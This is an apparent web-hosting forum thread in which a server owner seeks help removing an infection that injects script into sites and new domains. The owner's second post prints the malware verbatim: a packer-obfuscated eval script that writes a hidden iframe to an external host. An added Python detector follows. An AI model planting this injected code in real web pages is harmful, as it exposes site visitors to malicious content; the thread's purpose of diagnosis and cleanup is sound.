New domain + auto add virus code trouble

Daku

Verified User · Joined Sep 24, 2015 · Messages: 5
Hello,

If I wrote in the wrong category, please correct it and forgive me for it.

I bought a dedicated server with DA around a year ago.

Approximately 1 month ago something changed in DA.

At the start I had code randomly added to many files on any website on the server, <tag54.... </tag>; the virus creates an iframe to an infected website.

I've cleaned all files infected with it on the server, but the self-adding of code when a domain is added still works.

This is annoying and I want to prevent it and delete this trash (virus).

I've got DA + nginx + CSF + RK Hunter + ClamAV, so I think my server is secured.

Where can I find the script which creates domains?

I think that the main directadmin binary file is infected, but I don't recognize a virus in it.

Thanks for your answers.
Daku
 
Hello,

1. Check homedirs for malware with maldetect.
2. Update WP, Joomla, Drupal sites to their latest releases, any and all modules and addons for them.
3. Install with custombuild suhosin+upload-checker+clamav (remove clamav if you installed from repo of your OS).

After you find and remove malware on your server, you'd better change MySQL, FTP passwords for your users/accounts.
 
I did the previous steps you said, but after that my subdomains and new domains still get code added. The code below is added before the </body> tag:

HTML:
<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){
e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||
c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(
new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";
1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|
k0|1000|k01|if|setTimeout|k22|k2|http|122||src|height|118|width|board||197|php|179|tag1|ram'.split('|'),0,{}))</script>
<tag5479347352></tag5479347352>

The packed function creates an iframe which destroys my websites and tries to open an external link.

Maldet, ClamAV and others show nothing.
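Added example, not part of the original posts: since the thread reports that signature scanners found nothing, this Python sketch searches by the structure of the posted block instead (a numbered empty `<tagN></tagN>` marker followed by a packer-style `eval(function(p,a,c,k,e,d)` script) and can strip it. The extension list and the sample string are assumptions constructed for illustration.

```python
import os
import re
import sys

# Shape of the block posted in this thread: an empty numbered marker element,
# a packer-style eval(function(p,a,c,k,e,d){...}) script, a second marker.
INJECTION = re.compile(
    r"<tag(\d+)></tag\1>\s*"
    r"<script>\s*eval\(function\(p,a,c,k,e,d\).*?</script>\s*"
    r"(?:<tag\d+></tag\d+>)?",
    re.DOTALL,
)
WEB_EXTENSIONS = (".html", ".htm", ".php", ".tpl", ".js")  # assumption


def find_injections(text):
    """Return (start, end, marker_id) for every injected block in text."""
    return [(m.start(), m.end(), m.group(1)) for m in INJECTION.finditer(text)]


def strip_injections(text):
    """Return text with every matched block removed."""
    return INJECTION.sub("", text)


def scan_tree(root):
    """Walk root and return {path: [marker ids]} for files carrying the block."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = find_injections(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if found:
                hits[path] = [marker for _s, _e, marker in found]
    return hits


# Constructed sample (not the real payload): same structure, harmless body.
SAMPLE = ("<html><body><p>hi</p>\n<tag111></tag111><script>eval(function(p,a,c,k,e,d){\n"
          "return p}('0',1,1,''.split('|'),0,{}))</script>\n<tag112></tag112></body></html>")

if __name__ == "__main__":
    for path, markers in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, ",".join(markers))
```

Pass the directory to scan as the first argument; each output line is a file path followed by the marker numbers found in it.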
 